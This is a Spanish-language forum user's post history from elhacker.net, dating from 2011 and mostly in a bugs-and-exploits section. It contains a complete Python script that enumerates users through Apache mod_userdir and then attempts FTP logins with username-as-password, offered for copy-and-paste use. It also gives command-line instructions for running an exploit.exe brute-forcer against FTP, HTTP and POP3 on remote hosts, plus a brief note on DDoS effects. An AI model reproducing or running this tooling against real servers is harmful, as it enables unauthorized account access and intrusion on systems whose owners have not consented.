Lo pegas en un archivo y le das permisos de ejecucion al archivo, estas en linux no?
Tenes que tener python instalado.
Tenes que tener python instalado.
- Bienvenido a Test Foro de elhacker.net SMF 2.1.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#42
Bugs y Exploits / Re: mod_userdir Apache
12 Octubre 2011, 21:30 PM
El problema esta adentro de la funcion trylogonFTP()
Lo que tiene que hacer es simple, escribirlo en C es romperse la cabeza... ni conviene ponerse a ver donde se cuelga (que debe ser en algun recv)
Aca te hice uno que hace lo mismo pero en python. Menos lineas y muuucho mas facil de entender/corregir/mantener/mejorar/etc...
Copialo y pegalo. Le pasas el host y el nombre del archivo como parametros. Espero te sirva
Saludos!
Lo que tiene que hacer es simple, escribirlo en C es romperse la cabeza... ni conviene ponerse a ver donde se cuelga (que debe ser en algun recv)
Aca te hice uno que hace lo mismo pero en python. Menos lineas y muuucho mas facil de entender/corregir/mantener/mejorar/etc...
Código (python) [Seleccionar]
#!/usr/bin/python
import sys
import httplib
from ftplib import FTP
def usage():
print "Usage:"
print sys.argv[0] + " localhost users.txt"
return
if len(sys.argv) < 3:
print "#ERROR# Not enough arguments"
usage()
exit()
host = sys.argv[1]
fusers = sys.argv[2]
# Abrir archivo con usuarios
users = open(fusers, 'r')
print "Search for http users"
# Intentar conexiones por http y guardar los usuarios validos
valid_users = []
for user in users:
user = user.strip()
if not user:
continue
# Conectarse al servidor http
conn = httplib.HTTPConnection(host)
# Probar con el usuario user
print "Trying user " + user + " ...",
conn.request("GET", "/~{0}".format(user))
res = conn.getresponse()
if res.status == 404: # respuesta 404
print "not found"
else:
print "OK!"
# Salvar usuario
valid_users.append(user)
# Salir si no se encontro ningun usuario
if len(valid_users) == 0:
print "No user has been found. Aborting!"
exit()
# Probar por ftp ahora
print "Try login to ftp server"
for vuser in valid_users:
print "Trying user " + vuser + "...",; sys.stdout.flush()
try:
ftp = FTP(host, user = vuser, passwd = vuser)
ftp.quit()
print "OK!"
except:
print "refused"
Copialo y pegalo. Le pasas el host y el nombre del archivo como parametros. Espero te sirva
Saludos!
#43
Bugs y Exploits / Re: mod_userdir Apache
7 Octubre 2011, 20:54 PMCita de: SySc0d3r en 7 Octubre 2011, 20:38 PMEl archivo tiene que estar obligatoriamente en la misma carpeta que el exploit.exe
Sólo una cosa, ¿puedo usar el exploit desde este ordenador, por ejemplo, e intentar atacar un server alojado en otro ordenador que contiene el archivo con los usuarios? ¿O este archivo tiene que estar obligatoriamente en el misma carpeta que exploit.exe?
Pero podes lanzar el ataque contra un server remoto sin problemas, usando el archivo en local, es la idea principal del bruteforce.
Saludos!
#44
Bugs y Exploits / Re: mod_userdir Apache
7 Octubre 2011, 20:28 PM
Detalle, la opcion -f hace que exploit.exe intente hacer un bruteforce sobre el puerto 21(ftp). Sacale el -f si queres que ataque el puerto 80.
Con respecto a la direccion, localhost equivale a 127.0.0.1 y no a 192.168.1.1. Pone esa direccion sino, porque puede ser que el servidor http no este bindeado a localhost.
Con respecto a la direccion, localhost equivale a 127.0.0.1 y no a 192.168.1.1. Pone esa direccion sino, porque puede ser que el servidor http no este bindeado a localhost.
#45
Bugs y Exploits / Re: mod_userdir Apache
7 Octubre 2011, 08:36 AMCita de: SySc0d3r en 6 Octubre 2011, 12:39 PM
Al final encontré el archivo mod_userdir en la carpeta de Apache, y tiene extensión ".so".
¿Tengo que poner simplemente ésto para atacar mi server?
exploit.exe -f -h localhost -u mod_userdir.so
No, en -u tenes que poner un archivo de texto que contenga los nombres de usuario. Por ej suponete que en el archivo users.txt tenes esto
Código [Seleccionar]
admin
goku
neo
luke
kirk
elbrujo
Guarda el archivo users.txt en el mismo lugar donde ejecutas exploit y proba con esto:
Código (bash) [Seleccionar]
exploit.exe -f -h localhost -u users.txt
#46
Bugs y Exploits / Re: mod_userdir Apache
4 Octubre 2011, 08:35 AM
Hola SySc0d3r,
No es un exploit, es un bruteforce. Lo podes testear en localhost siempre y cuando tengas alguno de los servers que ataca:
- Apache con mod_userdir
- FTP
- POP3
Con la opcion -u le pasas un archivo con la lista de usuarios para el bruteforce, uno por linea.
Saludos
No es un exploit, es un bruteforce. Lo podes testear en localhost siempre y cuando tengas alguno de los servers que ataca:
- Apache con mod_userdir
- FTP
- POP3
Con la opcion -u le pasas un archivo con la lista de usuarios para el bruteforce, uno por linea.
Código (bash) [Seleccionar]
exploit.exe -f -h localhost -u archivo_con_usuarios.txtSaludos
#47
Bugs y Exploits / Re: ayuda con DEP problema al querer correr un bof
28 Septiembre 2011, 09:36 AM
Hola qqmelo,
Podrias pegar el codigo asm aca? Para ver las protecciones que podes llegar a tener.
Podrias pegar el codigo asm aca? Para ver las protecciones que podes llegar a tener.
#48
Bugs y Exploits / Re: Dropbear SSH Server
16 Septiembre 2011, 14:15 PM
Que version de dropbear tenes?
#49
Nivel Web / Re: ¿Un DDOS afecta solamente al sitio que se tiene de objetivo?
6 Septiembre 2011, 08:34 AMCita de: Lukhardy en 6 Septiembre 2011, 00:19 AMSi, se caen todos los sitios de ese servidor. O sea, saturas el daemon httpd para que no acepte mas pedidos legitimos, sea el dominio que sea que este manejando.
Una duda tengo. Si se hace un DDOS a una direccion de sitio web, ¿se caen todos los sitios alojados en el mismo servidor, o solo el sitio? La lógica me dice que sí, pero quiero asegurarme según sus comentarios.
Gracias che.
Saludos
#50
Noticias / Re: Microsoft plantea un navegador sin complementos gracias a HTML5
5 Septiembre 2011, 21:26 PM
No more flash dentro de poco tiempo? El sueño de Steve Jobs se hace realidad xD